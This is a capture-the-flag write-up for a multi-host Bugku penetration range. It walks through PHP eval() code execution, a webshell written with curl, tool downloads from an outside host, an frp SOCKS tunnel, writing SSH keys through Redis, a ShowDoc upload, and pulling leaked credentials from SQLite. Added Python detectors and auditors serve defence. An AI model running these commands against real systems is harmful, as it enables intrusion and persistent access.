Bugku Penetration 4 Target Practice Notes

Entry machine

Tested weak passwords, SQLi and directory scanning, all without result. The nmap output is below; SSH is not a weak password either.

nmap -sV -sC -Pn -p- 139.224.162.206
Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-27 21:22 +0800
Nmap scan report for 139.224.162.206
Host is up (0.029s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-title: \xE8\xBF\x90\xE7\xBB\xB4\xE7\xB3\xBB\xE7\xBB\x9F\xE7\x99\xBB\xE5\xBD\x95
|_http-server-header: Apache/2.4.54 (Debian)
22000/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 50:13:5f:50:2d:49:a4:19:37:68:5b:bc:dd:63:dd:e1 (RSA)
| 256 3d:36:a4:37:a8:b1:70:44:a3:11:ef:00:75:cc:cc:36 (ECDSA)
|_ 256 7f:fa:ae:05:75:1c:dd:93:c4:89:30:93:2d:80:6e:f8 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 227.46 seconds

While fuzzing, changing the action parameter produced an error:

  1. ajax.php has an eval() call on line 22
  2. the parameter you sent contains a call to the function df()
  3. since df() does not exist, it errors out

So arbitrary PHP code can be executed here (the machine was reset once midway, so the IPs don't match up):

POST /ajax.php HTTP/1.1
Host: 139.224.162.206

action=phpinfo()&username=admin&password=123456

That works; next, try writing a webshell:

curl -X POST 'http://139.224.162.206/ajax.php' -d 'action=file_put_contents("404.php","<?php%20@eval(\$_POST[pass]);?>")&username=admin&password=123'

Found flag1: flag{3c606558c25edf5725b8e1c7ae7bdd3d}
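
From the defender's side, the bug above is an eval() over a request parameter, and the useful detection signal is an action value that looks like code rather than a verb from the application's own dispatch table. The following Python is an added example written for these notes (not code from the target, from Bugku, or from the author): it assumes a request log in which the application or a WAF records the decoded POST body next to the request line (a stock Apache access log does not), a constructed allowlist of legitimate action names, and constructed sample lines built from the requests shown above.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed sample log in the form "METHOD PATH BODY" ("-" when there is no body).
# Assumption: the app or a WAF logs the decoded POST body; Apache's access log alone would not.
SAMPLE_LOG = """\
POST /ajax.php action=login&username=admin&password=123456
POST /ajax.php action=phpinfo()&username=admin&password=123456
POST /ajax.php action=file_put_contents("404.php","<?php @eval($_POST[pass]);?>")&username=admin&password=123
GET /index.php?page=home -
POST /ajax.php action=df()&username=a&password=b
"""

# Action names the application legitimately dispatches on (assumed; a real deployment
# would derive this from the dispatch table in ajax.php instead of guessing).
ALLOWED_ACTIONS = {"login", "logout", "status"}

# Anything that looks like a PHP call, a PHP open tag, or a superglobal reference.
SUSPICIOUS = re.compile(r"[A-Za-z_][A-Za-z0-9_]*\s*\(|<\?php|\$_(?:POST|GET|REQUEST|COOKIE)")


def parse_line(line):
    """Split one log line into (method, path, params) with query and body merged."""
    parts = line.split(" ", 2)
    method, path = parts[0], parts[1]
    body = parts[2] if len(parts) > 2 else "-"
    params = parse_qs(path.partition("?")[2], keep_blank_values=True)
    if body != "-":
        params.update(parse_qs(body, keep_blank_values=True))
    return method, path, params


def classify(line):
    """Return (verdict, reason) for one line: 'ok', 'warn' (unknown verb) or 'alert' (code-like)."""
    _method, _path, params = parse_line(line)
    for action in params.get("action", []):
        action = unquote_plus(action)  # second decode pass catches double-encoded values
        if action in ALLOWED_ACTIONS:
            continue
        if SUSPICIOUS.search(action):
            return ("alert", f"action looks like code: {action[:60]!r}")
        return ("warn", f"unknown action value: {action!r}")
    return ("ok", "")


def scan(log_text):
    """Classify every non-empty line; returns [(line_no, verdict, reason), ...]."""
    return [(n, *classify(l)) for n, l in enumerate(log_text.splitlines(), 1) if l.strip()]


if __name__ == "__main__":
    for line_no, verdict, reason in scan(SAMPLE_LOG):
        print(f"{line_no}: {verdict} {reason}")
```

The allowlist is the real fix, not the regex: an ajax.php that maps action names to handlers through a fixed table has nothing for eval() to do, and the regex then only exists to surface probes against the old code path.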

There is another flag under the root directory, so try privilege escalation:

Privilege escalation from inside the web shell is sometimes awkward, so first get a reverse shell up and keep trying from there. Checked the SUID binaries, nothing usable; what Linpeas collected is below:

CVE: CVE-2014-0038 | Name: timeoutpwn | Match data: pkg=linux-kernel,ver>=3.4.0,ver<=3.13.1,CONFIG_X86_X32=y | Tags: ubuntu=13.10 | Rank: 1 | Details: CONFIG_X86_X32 needs to be enabled
CVE: CVE-2014-0038 | Name: timeoutpwn 2 | Match data: pkg=linux-kernel,ver>=3.4.0,ver<=3.13.1,CONFIG_X86_X32=y | Tags: ubuntu=(13.04|13.10){kernel:3.(8|11).0-(12|15|19)-generic} | Rank: 1 | Details: CONFIG_X86_X32 needs to be enabled
CVE: CVE-2014-0196 | Name: rawmodePTY | Match data: pkg=linux-kernel,ver>=2.6.31,ver<=3.14.3 | Tags: 1
CVE: CVE-2014-2851 | Name: use-after-free in ping_init_sock() (DoS) | Match data: pkg=linux-kernel,ver>=3.0.1,ver<=3.14 | Tags: 0
CVE: CVE-2014-4014 | Name: inode_capable | Match data: pkg=linux-kernel,ver>=3.0.1,ver<=3.13 | Tags: ubuntu=12.04 | Rank: 1
CVE: CVE-2014-4943 | Name: PPPoL2TP (DoS) | Match data: pkg=linux-kernel,ver>=3.2,ver<=3.15.6 | Tags: 1
CVE: CVE-2014-5207 | Name: fuse_suid | Match data: pkg=linux-kernel,ver>=3.0.1,ver<=3.16.1 | Tags: 1
CVE: CVE-2015-9322 | Name: BadIRET | Match data: pkg=linux-kernel,ver>=3.0.1,ver<3.17.5,x86_64 | Tags: RHEL<=7,fedora=20 | Rank: 1
CVE: CVE-2015-8660 | Name: overlayfs (ovl_setattr) | Match data: pkg=linux-kernel,ver>=3.0.0,ver<=4.3.3 | Tags: 1
CVE: CVE-2015-8660 | Name: overlayfs (ovl_setattr) | Match data: pkg=linux-kernel,ver>=3.0.0,ver<=4.3.3 | Tags: ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic} | Rank: 1
CVE: CVE-2016-0728 | Name: keyring | Match data: pkg=linux-kernel,ver>=3.10,ver<4.4.1 | Tags: 0 | Rank: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working
CVE: CVE-2016-2384 | Name: usb-midi | Match data: pkg=linux-kernel,ver>=3.0.0,ver<=4.4.8 | Tags: ubuntu=14.04,fedora=22 | Rank: 1 | Details: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user
CVE: CVE-2016-5195 | Name: dirtycow | Match data: pkg=linux-kernel,ver>=2.6.22,ver<=4.8.3 | Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04 | Rank: 4 | Details: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
CVE: CVE-2016-5195 | Name: dirtycow 2 | Match data: pkg=linux-kernel,ver>=2.6.22,ver<=4.8.3 | Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic} | Rank: 4 | Details: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
CVE: CVE-2017-6074 | Name: dccp | Match data: pkg=linux-kernel,ver>=2.6.18,ver<=4.9.11,CONFIG_IP_DCCP=[my] | Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic} | Rank: 1 | Details: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
CVE: CVE-2017-7308 | Name: af_packet | Match data: pkg=linux-kernel,ver>=3.2,ver<=4.10.6,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 | Tags: ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic} | Rank: 1 | Details: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels
CVE: CVE-2017-1000253 | Name: PIE_stack_corruption | Match data: pkg=linux-kernel,ver>=3.2,ver<=4.13,x86_64 | Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1} | Rank: 1
CVE: CVE-2019-15666 | Name: XFRM_UAF | Match data: pkg=linux-kernel,ver>=3,ver<5.0.19,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1,CONFIG_XFRM=y | Tags: 1 | Rank: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
CVE: CVE-2021-27365 | Name: linux-iscsi | Match data: pkg=linux-kernel,ver<=5.11.3,CONFIG_SLAB_FREELIST_HARDENED!=y | Tags: RHEL=8 | Rank: 1 | Details: CONFIG_SLAB_FREELIST_HARDENED must not be enabled
CVE: CVE-2021-22555 | Name: Netfilter heap out-of-bounds write | Match data: pkg=linux-kernel,ver>=2.6.19,ver<=5.12-rc6 | Tags: ubuntu=20.04{kernel:5.8.0-*} | Rank: 1 | Details: ip_tables kernel module must be loaded
CVE: CVE-2022-32250 | Name: nft_object UAF (NFT_MSG_NEWSET) | Match data: pkg=linux-kernel,ver<5.18.1,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 | Tags: ubuntu=(22.04){kernel:5.15.0-27-generic} | Rank: 1 | Details: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
CVE: CVE-2018-14665 | Name: exploit_x | Match data: 2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36,2.6.37,2.6.38,2.6.39,3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6,3.1.0,3.2.0,3.3.0,3.4.0,3.5.0,3.6.0,3.7.0,3.7.6,3.8.0,3.9.0,3.10.0,3.11.0,3.12.0,3.13.0,3.14.0,3.15.0,3.16.0,3.17.0,3.18.0,3.19.0,4.0.0,4.1.0,4.2.0,4.3.0,4.4.0,4.5.0,4.6.0,4.7.0 | Tags: 1 | Rank: http://www.exploit-db.com/exploits/45697
CVE: CVE-2016-0728 | Name: pp_key | Match data: 3.4.0,3.5.0,3.6.0,3.7.0,3.8.0,3.8.1,3.8.2,3.8.3,3.8.4,3.8.5,3.8.6,3.8.7,3.8.8,3.8.9,3.9.0,3.9.6,3.10.0,3.10.6,3.11.0,3.12.0,3.13.0,3.13.1 | Tags: http://www.exploit-db.com/exploits/39277
CVE: CVE-2014-0038 | Name: timeoutpwn | Match data: 3.4.0,3.5.0,3.6.0,3.7.0,3.8.0,3.8.9,3.9.0,3.10.0,3.11.0,3.12.0,3.13.0,3.4.0,3.5.0,3.6.0,3.7.0,3.8.0,3.8.5,3.8.6,3.8.9,3.9.0,3.9.6,3.10.0,3.10.6,3.11.0,3.12.0,3.13.0,3.13.1 | Tags: http://www.exploit-db.com/exploits/31346

Tried every candidate and not a single one worked. Giving up on this for now...

192.168.0.202

Upload fscan and scan the internal network:

curl -O http://47.93.254.31:48888/fscan_2.1.3_linux_x64
./fscan -h 192.168.0.0/24 -o result.txt -np

Found a Redis weak password; as before, use frp as the internal network proxy:

serverAddr = "x.x.x.x"
serverPort = 47000

[[proxies]]
name = "socks"
type = "tcp"
remotePort = 6666

[proxies.plugin]
type = "socks5"

Redis public-key write through proxychains:

First generate a key pair and write the public key into 1.txt, then push it into Redis as a cached value, then go into redis-cli and have Redis write the public key out, and finally SSH in to take the Redis host and get flag2:

proxychains4 -q cat ./1.txt | proxychains4 -q redis-cli -h 192.168.0.202 -a 123456 -x set crackit
proxychains4 -q redis-cli -h 192.168.0.202 -a 123456
:6379> config set dir /root/.ssh/
OK
:6379> config set dbfilename authorized_keys
OK
:6379> save
OK
:6379> exit
# Port 22 won't connect here; guessed 22000 directly, since that's what the Nmap scan of the entry machine showed
proxychains4 -q ssh -i ~/.ssh/id_rsa_bkdoor root@192.168.0.202 -p 22000
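
The Redis step works only because the server accepts the connection, the password is guessable, and CONFIG SET dir/dbfilename plus SAVE are all reachable. The following Python is an added example (not part of these notes and not Redis's own tooling) that audits a redis.conf for exactly those conditions. Both config fragments are constructed: the weak one mirrors the state described here, the hardened one is a fixed version, and the password thresholds and common-password list are the example's own assumptions.

```python
import re

# Constructed redis.conf mirroring the weak state exploited above.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
requirepass 123456
"""

# Constructed hardened redis.conf; the requirepass value is a made-up placeholder secret.
HARDENED_CONF = """\
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass Xv9qLm2pR8tZ4wB7nK1sC6yD3hF0jG5e
rename-command CONFIG ""
rename-command SAVE ""
rename-command BGSAVE ""
rename-command FLUSHALL ""
"""

# Tiny list for the example; a real audit would use a proper breached-password set.
COMMON_PASSWORDS = {"123456", "password", "redis", "admin", "foobared"}
MIN_PASSWORD_LEN = 16  # assumed policy threshold


def parse_conf(text):
    """Return {directive: [args_of_each_occurrence]}; repeated directives keep every line."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, *args = line.split()
        conf.setdefault(key.lower(), []).append(args)
    return conf


def audit(text):
    """Return a list of human-readable findings for one redis.conf body."""
    conf = parse_conf(text)
    findings = []

    binds = conf.get("bind", [[]])[0]
    if not binds or any(b in ("0.0.0.0", "*", "::") for b in binds):
        findings.append("bind: listens on all interfaces")

    if conf.get("protected-mode", [["yes"]])[0][0].lower() != "yes":
        findings.append("protected-mode: disabled")

    pw_args = conf.get("requirepass", [[]])[0]
    pw = pw_args[0] if pw_args else ""
    if not pw:
        findings.append("requirepass: no password set")
    elif pw in COMMON_PASSWORDS or len(pw) < MIN_PASSWORD_LEN or not re.search(r"[^0-9]", pw):
        findings.append("requirepass: weak password")

    # Explicitly re-enabling protected configs (Redis 7) allows CONFIG SET dir/dbfilename again.
    if conf.get("enable-protected-configs", [["no"]])[0][0].lower() == "yes":
        findings.append("enable-protected-configs: dir/dbfilename writable over CONFIG SET")

    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    for cmd in ("CONFIG", "SAVE", "BGSAVE"):
        if cmd not in renamed:
            findings.append(f"{cmd}: command reachable (needed for the dir/dbfilename file write)")
    return findings


if __name__ == "__main__":
    for name, body in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(body) or "no findings")
```

Redis 7 ships enable-protected-configs no by default, which refuses CONFIG SET on dir and dbfilename even when CONFIG itself is reachable, and ACL rules (for example -@dangerous on the application user) are the current replacement for rename-command; the audit above treats rename-command as the minimum and does not parse ACL files, so a server secured purely through ACLs would still show the three "reachable" findings.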

Was expecting private-key reuse, but Note.md in the root directory has a hint that gives the password:

echo "Dev@Bug_C00l123" | passwd --stdin root

This looks like the entry machine's password, since it's the ops account. Logged in to the entry machine and got flag3 under /root: flag{c34467603f306fe28566d79428e40903}. Turns out privilege escalation wasn't needed.

172.16.0.153

Ran linpeas.sh on the Redis machine and picked up network information: 172.16.0.0/24

Ran fscan -h 172.16.0.0/24 -np to scan the subnet on the other NIC: found one unknown host, 172.16.0.153

Set up a new frp tunnel on the Redis machine and found that 172.16.0.153 is a platform built on showdoc. Searched its historical vulnerabilities: there is an unauthenticated front-end file upload.

Got the uploaded file's path, connected to it, and got flag4

Same story here: find: '/root': Permission denied, so privilege escalation is needed again. Tested the usual privesc techniques and exploits, none worked; presumably these machines have all been patched, so the intended path isn't here. Keep collecting information: look for site configuration files, databases and the like.

Contents of /var/www/html/server/Application/Common/Conf/config.php:

<?php
return array(
//'config item'=>'config value'
//use the sqlite database
'DB_TYPE' => 'Sqlite',
'DB_NAME' => '../Sqlite/showdoc.db.php',
//showdoc no longer supports mysql http://www.showdoc.cc/help?page_id=31990
'DB_HOST' => 'localhost',
'DB_USER' => 'showdoc',
'DB_PWD' => 'showdoc123456',
'DB_PORT' => 3306, // port
'DB_PREFIX' => '', // database table prefix
'DB_CHARSET'=> 'utf8', // character set
'DB_DEBUG' => TRUE, // database debug mode; when enabled, SQL logs are recorded
'URL_HTML_SUFFIX' => '',//URL pseudo-static suffix
'URL_MODEL' => 3 ,//URL compatibility mode
'URL_ROUTER_ON' => true,
'URL_ROUTE_RULES'=>array(

showdoc.db.php is the SQLite database file of the ShowDoc online documentation tool. Viewed the database contents with the online viewer https://inloop.github.io/sqlite-viewer/: there is a `devteam/f2ef774f5af471562035a1847f307afc` account, but the password is an MD5 hash; looked it up to see whether a plaintext was available, but unfortunately nothing was found.

There is also a user_token table, though:

Following the source code, put cookie_token=5b531b30bd77182266fde38a03d51579330d77c12fdc5a76f2524becb9905482 in the cookie. For some reason login still failed, so went back through the database contents and found the test credentials root/Test@1234 in the page table.

Got the last flag, flag5: flag{70c40123ca473e673b2afe89e72b0dc6}
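
The last hop was won by secrets sitting in the application's own data: an unsalted MD5 password hash in the user table and a plaintext test credential in a documentation page. The following Python is an added example (not part of these notes and not ShowDoc code) that audits a copy of such a SQLite file for both patterns. It builds a constructed in-memory stand-in for showdoc.db.php; the page table name comes from the notes, while the user table name, every column name and the sample rows are assumptions, and the credential regexes are heuristics of the example's own.

```python
import re
import sqlite3

# Constructed stand-in for showdoc.db.php. Column names are assumed, not ShowDoc's real schema.
SCHEMA = """
CREATE TABLE user (uid INTEGER, username TEXT, password TEXT);
CREATE TABLE page (page_id INTEGER, page_title TEXT, page_content TEXT);
"""

# Constructed rows: the devteam hash is the one seen above; the page text is invented.
SAMPLE_ROWS = [
    ("INSERT INTO user VALUES (?,?,?)", (1, "devteam", "f2ef774f5af471562035a1847f307afc")),
    ("INSERT INTO page VALUES (?,?,?)", (1, "Test env", "Test host login: root/Test@1234 (do not share)")),
    ("INSERT INTO page VALUES (?,?,?)", (2, "Deploy notes", "Run composer install, then restart php-fpm.")),
]

# A bare 32-hex-digit value is almost certainly an unsalted MD5 hash rather than bcrypt/argon2.
MD5_HEX = re.compile(r"^[0-9a-f]{32}$")

# Heuristics for credentials pasted into free text (example's own; tune before real use).
CRED_PATTERNS = [
    re.compile(r"(?<![/:\w])([A-Za-z0-9_.-]+)/([^\s,;/)]{6,})"),      # user/password, e.g. root/Test@1234
    re.compile(r"(?i)\b(?:pass(?:word)?|pwd)\s*[:=]\s*(\S+)"),       # password: hunter2
]


def build_sample_db():
    """Create the constructed in-memory database used by the example."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    for sql, params in SAMPLE_ROWS:
        conn.execute(sql, params)
    return conn


def audit_users(conn):
    """Flag accounts whose stored password is a bare unsalted MD5 digest."""
    findings = []
    for _uid, name, pw in conn.execute("SELECT uid, username, password FROM user"):
        if MD5_HEX.match(pw or ""):
            findings.append((name, "unsalted MD5 password hash"))
    return findings


def audit_pages(conn):
    """Flag documentation pages whose content contains a credential-looking fragment."""
    findings = []
    for pid, title, content in conn.execute("SELECT page_id, page_title, page_content FROM page"):
        for pattern in CRED_PATTERNS:
            match = pattern.search(content or "")
            if match:
                findings.append((pid, title, match.group(0)))
                break  # one finding per page is enough for triage
    return findings


if __name__ == "__main__":
    db = build_sample_db()
    print("users:", audit_users(db))
    print("pages:", audit_pages(db))
```

The user/password pattern deliberately refuses a preceding "/" or ":" so that URL paths do not trip it, but it will still produce false positives on ordinary "a/b" text, so treat its output as a triage queue rather than a verdict; the MD5 check, by contrast, is a firm finding on any modern application.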

Summary

Entry machine command-execution trick -> internal-network Redis public-key write -> showdoc file upload -> sqlite database parsing

This tests information gathering around passwords. The privilege escalation part was a slog; the time spent there got nowhere.